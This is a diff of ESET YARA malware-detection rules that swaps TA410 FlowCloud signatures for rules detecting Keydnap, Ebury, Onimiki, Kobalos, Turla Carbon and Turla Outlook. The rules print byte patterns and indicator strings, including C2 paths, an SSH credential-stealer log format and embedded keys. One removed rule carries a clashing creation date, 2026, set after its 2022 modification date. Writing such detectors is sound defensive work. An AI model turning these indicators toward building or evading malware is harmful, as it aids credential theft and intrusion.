 	meta:
-		description = "Matches message header creation in LookBack."
-		author = "ESET Research"
-		id = "5a40a307-772b-5600-9e58-f4bc6dfe6711"
-		date = "2021-10-12"
-		modified = "2022-04-27"
-		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L351-L377"
+		description = "Unpacked OSX/Keydnap backdoor"
+		author = "Marc-Etienne M.Léveillé"
+		id = "099c1796-6237-5ec1-ba25-cd5feca79865"
+		date = "2016-07-06"
+		modified = "2016-07-06"
+		reference = "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-is-hungry-for-credentials"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/keydnap/keydnap.yar#L69-L86"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "442a08a77fd2db03e507c0d5a32b17ab4e5936a209f7af23ef3c33a4b9f3d0d5"
+		logic_hash = "fa209577a562ef9088d3ad3df3fbc0edda96f09d19177842f0ddea42c658f530"
 		score = 75
 		quality = 80
-		tags = "FILE"
-		license = "BSD 2-Clause"
+		tags = ""
 		version = "1"
 
 	strings:
-		$s1 = {
-            C7 03 C2 2E AB 48           //mov dword ptr [ebx], 0x48ab2ec2
-            ( A1 | 8B 15 ) ?? ?? ?? ??      //mov (eax | edx), x
-            [0-1]               //push ebp
-            89 ?3 04            //mov dword ptr [ebc + 4], reg
-            8B 4? 24 ??             //mov reg, dword ptr [esp + X]
-            89 4? 08            //mov dword ptr [ebx + 8], ??
-            89 ?? 0C            //mov dword ptr [ebx + 0xc], ??
-            8B 4? 24 ??             //mov reg, dword ptr [esp + X]
-            [1-2]               //push 1 or 2 args
-            E8 ?? ?? ?? ??          //call
-        }
+		$ = "api/osx/get_task"
+		$ = "api/osx/cmd_executed"
+		$ = "Loader-"
+		$ = "u2RLhh+!LGd9p8!ZtuKcN"
+		$ = "com.apple.iCloud.sync.daemon"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		2 of them
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Loader_Strings : FILE
+
+rule ESET_Libkeyutils_With_Ctor
 {
 	meta:
-		description = "Matches various strings found in TA410 FlowCloud first stage."
-		author = "ESET Research"
-		id = "a3fb894f-8e26-5cbd-a1f2-8a9ab1db0901"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		description = "This rule detects if a libkeyutils.so shared library has a potentially malicious function to be called when loaded, either via a glibc constructor (DT_INIT + .ctors) or an initializer function in DT_INIT_ARRAY."
+		author = "ESET, spol. s r.o."
+		id = "7b466bf7-f895-569d-99b0-eca95a6ebc83"
+		date = "2024-02-01"
+		modified = "2024-04-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L379-L415"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/windigo/ebury.yar#L3-L54"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "3c90723e009ffe2603910566ac52a324256676ee3ff128d94427681010e10e8b"
-		score = 75
-		quality = 78
-		tags = "FILE"
+		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
+		logic_hash = "c6172aebc67a05fb044b0450aafcc71c7d1fd2831985587d1a9ad53f59e14214"
+		score = 40
+		quality = 80
+		tags = ""
 		license = "BSD 2-Clause"
-		version = "1"
+		version = 2
 
 	strings:
-		$key = "y983nfdicu3j2dcn09wur9*^&initialize(y4r3inf;'fdskaf'SKF"
-		$s2 = "startModule" fullword
-		$s4 = "auto_start_module" wide
-		$s5 = "load_main_module_after_install" wide
-		$s6 = "terminate_if_fail" wide
-		$s7 = "clear_run_mru" wide
-		$s8 = "install_to_vista" wide
-		$s9 = "load_ext_module" wide
-		$s10 = "sll_only" wide
-		$s11 = "fail_if_already_installed" wide
-		$s12 = "clear_hardware_info" wide
-		$s13 = "av_check" wide fullword
-		$s14 = "check_rs" wide
-		$s15 = "check_360" wide
-		$s16 = "responsor.dat" wide ascii
-		$s17 = "auto_start_after_install_check_anti" wide fullword
-		$s18 = "auto_start_after_install" wide fullword
-		$s19 = "extern_config.dat" wide fullword
-		$s20 = "is_hhw" wide fullword
-		$s21 = "SYSTEM\\Setup\\PrintResponsor" wide
-		$event = "Global\\Event_{201a283f-e52b-450e-bf44-7dc436037e56}" wide ascii
-		$s23 = "invalid encrypto hdr while decrypting"
+		$libname = "libkeyutils.so.1"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( $key or $event or 5 of ( $s* ) )
+		for any ptr_size in ( 4 , 8 ) : ( ( ( ptr_size == 4 and elf.machine == elf.EM_386 ) or ( ptr_size == 8 and elf.machine == elf.EM_X86_64 ) ) and for any d in elf.dynamic : ( d.type == elf.DT_SONAME and ( for any s in elf.sections : ( s.name == ".dynstr" and $libname at ( s.offset + d.val ) ) or for any s in elf.dynamic : ( s.type == elf.DT_STRTAB and $libname at ( s.val + d.val ) ) ) ) and ( for any s in elf.sections : ( s.name == ".ctors" and s.size > 2 * ptr_size ) or for any d in elf.dynamic : ( d.type == elf.DT_INIT_ARRAYSZ and d.val > ptr_size ) ) )
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Header_Decryption : FILE
+rule ESET_Ebury_V1_7_Crypto
 {
 	meta:
-		description = "Matches the function used to decrypt resources headers in TA410 FlowCloud"
-		author = "ESET Research"
-		id = "403c1845-bc25-5a49-8553-8a0be18d6970"
-		date = "2026-01-22"
-		modified = "2022-04-27"
+		description = "This rule detects the strings decryption routine in Ebury v1.7 and v1.8"
+		author = "ESET, spol. s r.o."
+		id = "93dadf5f-b572-5217-8c82-4957c6d24955"
+		date = "2023-08-01"
+		modified = "2024-04-29"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L417-L496"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/windigo/ebury.yar#L56-L97"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "74b6c42bf2de159b2b0a15637e6bd94069367e3000c887714d6e3b50aa3646be"
+		hash = "e7debd6e453192ad8376db5bab03ed0d87566591"
+		logic_hash = "41908951069a472d7528f2f228f3681f008d16a0436e341d339909efc4933e66"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
+		version = 1
 
 	strings:
-		$chunk_1 = {
-            8B 1E
-            8B CF
-            D3 CB
-            8D 0C 28
-            83 C7 06
-            30 18
-            8B 1E
-            D3 CB
-            8D 0C 02
-            30 58 ??
-            8B 1E
-            D3 CB
-            8B 4C 24 ??
-            03 C8
-            30 58 ??
-            8B 1E
-            D3 CB
-            8B 4C 24 ??
-            03 C8
-            30 58 ??
-            8B 1E
-            D3 CB
-            8B 4C 24 ??
-            03 C8
-            83 C0 06
-            30 58 ??
-            8B 1E
-            D3 CB
-            30 58 ??
-            83 FF 10
-            72 ??
+		$64 = {
+            48 69 ( 9C 24 ?? ?? ?? ?? | 5C 24 ?? | D2) 6D 4E C6 41 //  imul    rbx, [rsp+_buf], 41C64E6Dh
+            8B (0C 16 | 34 07)                      //  mov     ecx, [rsi+rdx]
+            48 81 C? 39 30 00 00                    //  add     rbx, 12345
+            ( 31 D? |                               //  xor     ecx, ebx
+              31 D? 48 89 9C 24 ?? ?? ?? ?? |       //  mov     [rsp+_buf], rbx
+              31 D? 48 89 5C 24 ?? )                //  ^ optional
+            89 (0C 10 | 34 01)                      //  mov     [rax+rdx], ecx
+            48 83 C? 04                             //  add     rdx, 4
+            48 (81 FA | 3D ) ?? ?? ?? ??            //  cmp     rdx, _size
+            75 D?                                   //  jnz     short _begin
+        }
+		$32 = {
+            69 C9 6D 4E C6 41      // imul    ecx, 41C64E6Dh
+            8B B4 1A ?? ?? ?? ??   // mov     esi, [edx+ebx+_data]
+            81 C1 39 30 00 00      // add     ecx, 12345
+            31 CE                  // xor     esi, ecx
+            89 34 10               // mov     [eax+edx], esi
+            83 C2 04               // add     edx, 4
+            81 FA ?? ?? ?? ??      // cmp     edx, _size
+            75 DD                  // jnz     short loc_69A5
         }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		any of them
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Dll_Hijacking_Strings : FILE
+rule ESET_Onimiki : LINUX_ONIMIKI
 {
 	meta:
-		description = "Matches filenames inside TA410 FlowCloud malicious DLL."
-		author = "ESET Research"
-		id = "6636d4d0-0a7f-5971-a7f4-58803042d874"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		description = "Linux/Onimiki malicious DNS server"
+		author = "Olivier Bilodeau <bilodeau@eset.com>"
+		id = "3a99799f-fbb4-5fee-a796-3310acd10e17"
+		date = "2014-02-06"
+		modified = "2014-04-04"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L498-L517"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/windigo/windigo-onimiki.yar#L32-L59"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "e8082d4216364a12ba395f772b5caed94b3068d26a2b3a97ef711d61a82f65b3"
+		logic_hash = "eac30f5c9a9606d1d0e14c55e0532c54976fbb0d2e4f5cd2d9f719b77e07161a"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = "LINUX/ONIMIKI"
+		malware = "Linux/Onimiki"
+		operation = "Windigo"
+		contact = "windigo@eset.sk"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$dat1 = "emedres.dat" wide
-		$dat2 = "vviewres.dat" wide
-		$dat3 = "setlangloc.dat" wide
-		$dll1 = "emedres.dll" wide
-		$dll2 = "vviewres.dll" wide
-		$dll3 = "setlangloc.dll" wide
+		$a1 = {43 0F B6 74 2A 0E 43 0F  B6 0C 2A 8D 7C 3D 00 8D}
+		$a2 = {74 35 00 8D 4C 0D 00 89  F8 41 F7 E3 89 F8 29 D0}
+		$a3 = {D1 E8 01 C2 89 F0 C1 EA  04 44 8D 0C 92 46 8D 0C}
+		$a4 = {8A 41 F7 E3 89 F0 44 29  CF 29 D0 D1 E8 01 C2 89}
+		$a5 = {C8 C1 EA 04 44 8D 04 92  46 8D 04 82 41 F7 E3 89}
+		$a6 = {C8 44 29 C6 29 D0 D1 E8  01 C2 C1 EA 04 8D 04 92}
+		$a7 = {8D 04 82 29 C1 42 0F B6  04 21 42 88 84 14 C0 01}
+		$a8 = {00 00 42 0F B6 04 27 43  88 04 32 42 0F B6 04 26}
+		$a9 = {42 88 84 14 A0 01 00 00  49 83 C2 01 49 83 FA 07}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $dat* ) or all of ( $dll* ) )
+		all of them
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Malicious_Dll_Antianalysis : FILE
+rule ESET_Kobalos
 {
 	meta:
-		description = "Matches anti-analysis techniques used in TA410 FlowCloud hijacking DLL."
-		author = "ESET Research"
-		id = "b38a1d4d-5053-5a6d-be8c-c00261936417"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		description = "Kobalos malware"
+		author = "Marc-Etienne M.Léveillé"
+		id = "cdffbe3d-c19d-53a8-9051-48affae00c8a"
+		date = "2020-11-02"
+		modified = "2021-02-01"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L519-L552"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/kobalos/kobalos.yar#L32-L56"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "8f14352118d32a43c17f70bd753acc48bd314965f10ab97818e8a434bbda96d9"
+		logic_hash = "9161d22f9fbb1700dc3121e32104240e34512cb280aaf950aec61513f89061ef"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
 	strings:
-		$chunk_1 = {
-            33 C0
-            E8 ?? ?? ?? ??
-            83 C0 10
-            3D 00 00 00 80
-            7D 01
-            EB FF
-            E0 50
-            C3
+		$encrypted_strings_sizes = {
+            05 00 00 00 09 00 00 00  04 00 00 00 06 00 00 00
+            08 00 00 00 08 00 00 00  02 00 00 00 02 00 00 00
+            01 00 00 00 01 00 00 00  05 00 00 00 07 00 00 00
+            05 00 00 00 05 00 00 00  05 00 00 00 0A 00 00 00
         }
+		$password_md5_digest = { 3ADD48192654BD558A4A4CED9C255C4C }
+		$rsa_512_mod_header = { 10 11 02 00 09 02 00 }
+		$strings_rc4_key = { AE0E05090F3AC2B50B1BC6E91D2FE3CE }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
-}
-
-rule ESET_Apt_Windows_TA410_Flowcloud_Pdb : FILE
+		any of them
+}
+rule ESET_Kobalos_Ssh_Credential_Stealer
 {
 	meta:
-		description = "Matches PDB paths found in TA410 FlowCloud."
-		author = "ESET Research"
-		id = "8bf25768-941e-55c6-bd21-f6b614c9d75d"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		description = "Kobalos SSH credential stealer seen in OpenSSH client"
+		author = "Marc-Etienne M.Léveillé"
+		id = "b1fc5163-de48-57fc-8ae7-1f2be6c64d8a"
+		date = "2020-11-02"
+		modified = "2021-02-01"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L554-L567"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/kobalos/kobalos.yar#L58-L73"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "ff95ab0f8e68efe612a6e0d70cebd8bf815d6b5e3877c098ac0761382dc310d6"
+		logic_hash = "be238f5c2cc976a5638584a8c0fc580f2076735aadfe374e8d4162ba723bce10"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		license = "BSD 2-Clause"
 		version = "1"
 
+	strings:
+		$ = "user: %.128s host: %.128s port %05d user: %.128s password: %.128s"
+
 	condition:
-		uint16( 0 ) == 0x5a4d and ( pe.pdb_path contains "\\FlowCloud\\trunk\\" or pe.pdb_path contains "\\flowcloud\\trunk\\" )
+		any of them
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Shellcode_Decryption : FILE
+rule ESET_Generic_Carbon : FILE
 {
 	meta:
-		description = "Matches the decryption function used in TA410 FlowCloud self-decrypting DLL"
+		description = "Turla Carbon malware"
 		author = "ESET Research"
-		id = "8af7b2fa-be40-5ec8-8413-1c982a463a9a"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		id = "efdc0d16-a974-5c00-a401-391d60f3081e"
+		date = "2017-03-30"
+		modified = "2017-03-30"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L569-L615"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/carbon.yar#L33-L51"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "939ffe6a41c957aa5d6c012484b2deab49a5e71a4b7e203a41c180f872803921"
+		logic_hash = "6481ccafb7c7c78bc52d01881cb96f3aa6209fdd35e090bdc9d5f5105b4e38ea"
 		score = 75
 		quality = 80
 		tags = "FILE"
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$chunk_1 = {
-            33 D2
-            8B 45 ??
-            BB 6B 04 00 00
-            F7 F3
-            81 C2 A8 01 00 00
-            81 E2 FF 00 00 00
-            8B 7D ??
-            33 C9
-            EB ??
-            30 14 39
-            00 14 39
-            41
-            3B 4D ??
-            72 ??
-        }
+		$s1 = "ModStart"
+		$t1 = "STOP|OK"
+		$t2 = "STOP|KILL"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them
+		( uint16( 0 ) == 0x5a4d ) and ( 1 of ( $s* ) ) and ( 1 of ( $t* ) )
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Fcclient_Strings : FILE
+
+rule ESET_Carbon_Metadata
 {
 	meta:
-		description = "Strings found in fcClient/rescure.dat module."
+		description = "Turla Carbon malware"
 		author = "ESET Research"
-		id = "876bae0b-2612-559b-9ead-b633a3789663"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		id = "976b6a7d-00bf-5d0f-baf9-84fc5dbd21a2"
+		date = "2017-03-30"
+		modified = "2017-03-30"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L617-L639"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/carbon.yar#L53-L69"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "c05b7031a5aec1bcf29eca06c010c402edeb24a093a2043dbc21781dff22c7fe"
+		logic_hash = "81b59e9566f3b3356acf12dadb80abdcbee28e0b1a9efead66fcb95bf6fc1aa5"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
-
-	strings:
-		$s1 = "df257bdd-847c-490e-9ef9-1d7dc883d3c0"
-		$s2 = "\\{2AFF264E-B722-4359-8E0F-947B85594A9A}"
-		$s3 = "Global\\{26C96B51-2B5D-4D7B-BED1-3DCA4848EDD1}" wide
-		$s4 = "{804423C2-F490-4ac3-BFA5-13DEDE63A71A}" wide
-		$s5 = "{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}" wide
-		$s6 = "XXXModule_func.dll"
-		$driver1 = "\\drivers\\hidmouse.sys" wide fullword
-		$driver2 = "\\drivers\\hidusb.sys" wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( any of ( $s* ) or all of ( $driver* ) )
+		(pe.version_info [ "InternalName" ] contains "SERVICE.EXE" or pe.version_info [ "InternalName" ] contains "MSIMGHLP.DLL" or pe.version_info [ "InternalName" ] contains "MSXIML.DLL" ) and pe.version_info [ "CompanyName" ] contains "Microsoft Corporation"
 }
-rule ESET_Apt_Windows_TA410_Flowcloud_Fcclientdll_Strings : FILE
+rule ESET_Turla_Outlook_Gen
 {
 	meta:
-		description = "Strings found in fcClientDll/responsor.dat module."
+		description = "Turla Outlook malware"
 		author = "ESET Research"
-		id = "80ecaf51-406f-590c-8f9c-59672683de02"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		id = "efef2443-c941-54c2-abfa-bbe29c53d930"
+		date = "2018-05-09"
+		modified = "2018-09-05"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L641-L669"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L42-L74"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "3a93f58cf14b57a96157077ec14aa6fb181e3da80f4ba46c0379a58b67c08a0e"
+		logic_hash = "f709e517e9d957775601670c426cc9def1c4104cb1ff647d269800d2af4372c7"
 		score = 75
-		quality = 80
-		tags = "FILE"
+		quality = 78
+		tags = ""
+		version = 2
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$s1 = "http://%s/html/portlet/ext/draco/resources/draco_manager.swf/[[DYNAMIC]]/1"
-		$s2 = "Cookie: COOKIE_SUPPORT=true; JSESSIONID=5C7E7A60D01D2891F40648DAB6CB3DF4.jvm1; COMPANY_ID=10301; ID=666e7375545678695645673d; PASSWORD=7a4b48574d746470447a303d; LOGIN=6863303130; SCREEN_NAME=4a2b455377766b657451493d; GUEST_LANGUAGE_ID=en-US"
-		$fc_msg = ".fc_net.msg"
-		$s4 = "\\pipe\\namedpipe_keymousespy_english" wide
-		$s5 = "8932910381748^&*^$58876$%^ghjfgsa413901280dfjslajflsdka&*(^7867=89^&*F(^&*5678f5ds765f76%&*%&*5"
-		$s6 = "cls_{CACB140B-0B82-4340-9B05-7983017BA3A4}" wide
-		$s7 = "HTTP/1.1 200 OK\x0d\nServer: Apache-Coyote/1.1\x0d\nPragma: No-cache\x0d\nCache-Control: no-cache\x0d\nExpires: Thu, 01 Jan 1970 08:00:00 CST\x0d\nLast-Modified: Fri, 27 Apr 2012 08:11:04 GMT\x0d\nContent-Type: application/xml\x0d\nContent-Length: %d\x0d\nDate: %s GMT"
-		$sql1 = "create table if not exists table_filed_space"
-		$sql2 = "create table if not exists clipboard"
-		$sql3 = "create trigger if not exists file_after_delete after delete on file"
-		$sql4 = "create trigger if not exists file_data_after_insert after insert on file_data"
-		$sql5 = "create trigger if not exists file_data_after_delete after delete on file_data"
-		$sql6 = "create trigger if not exists file_data_after_update after update on file_data"
-		$sql7 = "insert into file_data(file_id, ofs, data, status)"
+		$s1 = "Outlook Express" ascii wide
+		$s2 = "Outlook watchdog" ascii wide
+		$s3 = "Software\\RIT\\The Bat!" ascii wide
+		$s4 = "Mail Event Window" ascii wide
+		$s5 = "Software\\Mozilla\\Mozilla Thunderbird\\Profiles" ascii wide
+		$s6 = "%%PDF-1.4\n%%%c%c\n" ascii wide
+		$s7 = "%Y-%m-%dT%H:%M:%S+0000" ascii wide
+		$s8 = "rctrl_renwnd32" ascii wide
+		$s9 = "NetUIHWND" ascii wide
+		$s10 = "homePostalAddress" ascii wide
+		$s11 = "/EXPORT;OVERRIDE;START=-%d;END=-%d;FOLDER=%s;OUT=" ascii wide
+		$s12 = "Re:|FWD:|AW:|FYI:|NT|QUE:" ascii wide
+		$s13 = "IPM.Note" ascii wide
+		$s14 = "MAPILogonEx" ascii wide
+		$s15 = "pipe\\The Bat! %d CmdLine" ascii wide
+		$s16 = "PowerShellRunner.dll" ascii wide
+		$s17 = "cmd container" ascii wide
+		$s18 = "mapid.tlb" ascii wide nocase
+		$s19 = "Content-Type: F)*+" ascii wide fullword
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( any of ( $s* ) or #fc_msg >= 8 or 4 of ( $sql* ) )
+		ESET_Not_Ms_PRIVATE and 5 of them
 }
-rule ESET_Apt_Windows_TA410_Rootkit_Strings : FILE
+rule ESET_Turla_Outlook_Filenames
 {
 	meta:
-		description = "Strings found in TA410's Rootkit"
+		description = "Turla Outlook filenames"
 		author = "ESET Research"
-		id = "a6a97721-571e-5414-9b00-5789d7bcd078"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		id = "3a08003d-50d6-5fdf-9f74-222335ebfa3e"
+		date = "2018-08-22"
+		modified = "2018-09-05"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L671-L697"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L76-L91"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "1d3ad63508c5e4bca32b9a44b738cb4a7384ccfa5704ce329260adb342ea4e60"
+		logic_hash = "3be86c9325de6634c032321beed131fdf1e1952afcb43258fb202d0097610501"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	strings:
-		$driver1 = "\\Driver\\kbdclass" wide
-		$driver2 = "\\Driver\\mouclass" wide
-		$device1 = "\\Device\\KeyboardClass0" wide
-		$device2 = "\\Device\\PointerClass0" wide
-		$driver3 = "\\Driver\\tcpip" wide
-		$device3 = "\\Device\\tcp" wide
-		$driver4 = "\\Driver\\nsiproxy" wide
-		$device4 = "\\Device\\Nsi" wide
-		$reg1 = "\\Registry\\Machine\\SYSTEM\\Setup\\AllowStart\\ceipCommon" wide
-		$reg2 = "RHH%d" wide
-		$reg3 = "RHP%d" wide
-		$s1 = "\\SystemRoot\\System32\\drivers\\hidmouse.sys" wide
+		$s1 = "mapid.tlb"
+		$s2 = "msmime.dll"
+		$s3 = "scawrdot.db"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s1 , $reg* ) and ( all of ( $driver* ) or all of ( $device* ) )
+		any of them
 }
-
-rule ESET_Apt_Windows_TA410_Flowcloud_V5_Resources : FILE
+rule ESET_Turla_Outlook_Log
 {
 	meta:
-		description = "Matches sequence of PE resource IDs found in TA410 FlowCloud version 5.0.2"
+		description = "First bytes of the encrypted Turla Outlook logs"
 		author = "ESET Research"
-		id = "05a233f0-a823-5154-a47d-cede722d4710"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		id = "b0031c08-8418-5a02-8a2c-daa7236f46f0"
+		date = "2018-08-22"
+		modified = "2018-09-05"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L699-L720"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L93-L107"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "58f75dda53c6d4b3d88f464c452d855ac6dc88add5f4fba2641f52e7a1ae00ed"
+		logic_hash = "e7dc00c33a643c0940aaea2096d099192b27df3c81c518f1dc2b3d45a0a74312"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
+
+	strings:
+		$s1 = {01 87 C9 75 C8 69 98 AC E0 C9 7B [21] EB BB 60 BB 5A}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.number_of_resources >= 13 and for 12 resource in pe.resources : ( resource.type == 10 and resource.language == 1033 and ( resource.name_string == "1\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x000\x000\x00" or resource.name_string == "1\x000\x000\x001\x00" or resource.name_string == "1\x000\x001\x00" or resource.name_string == "1\x000\x002\x00" or resource.name_string == "1\x000\x003\x00" or resource.name_string == "1\x000\x004\x00" or resource.name_string == "1\x000\x005\x00" or resource.name_string == "1\x000\x006\x00" or resource.name_string == "1\x000\x007\x00" or resource.name_string == "1\x000\x008\x00" or resource.name_string == "1\x000\x009\x00" or resource.name_string == "1\x001\x000\x00" or resource.name_string == "2\x000\x000\x000\x00" or resource.name_string == "2\x000\x000\x001\x00" ) )
+		$s1 at 0
 }
 
-rule ESET_Apt_Windows_TA410_Flowcloud_V4_Resources : FILE
+rule ESET_Turla_Outlook_Exports
 {
 	meta:
-		description = "Matches sequence of PE resource IDs found in TA410 FlowCloud version 4.1.3"
+		description = "Export names of Turla Outlook Malware"
 		author = "ESET Research"
-		id = "57b98823-439f-5a2c-a8cb-ac5e98953b06"
-		date = "2021-10-12"
-		modified = "2022-04-27"
+		id = "6df4f75e-711a-539d-94bf-9e4e2063ecd4"
+		date = "2018-08-22"
+		modified = "2018-09-05"
 		reference = "https://github.com/eset/malware-ioc/"
-		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/ta410/ta410.yar#L722-L741"
+		source_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/turla/turla-outlook.yar#L109-L125"
 		license_url = "https://github.com/eset/malware-ioc/blob/707f5b6899baf4e4911454e655a6428d9d3eeaa4/LICENSE"
-		logic_hash = "7b475cfddb5f995f7e8e3293b8e6ae59a9e36143998bc444499b5dce467f8e9d"
+		logic_hash = "a961fdb43ea1e99b308f55b8f5e264b1f3fa817eaf463d512e2ad8b98a18ee99"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
+		contact = "github@eset.com"
 		license = "BSD 2-Clause"
-		version = "1"
 
 	condition:
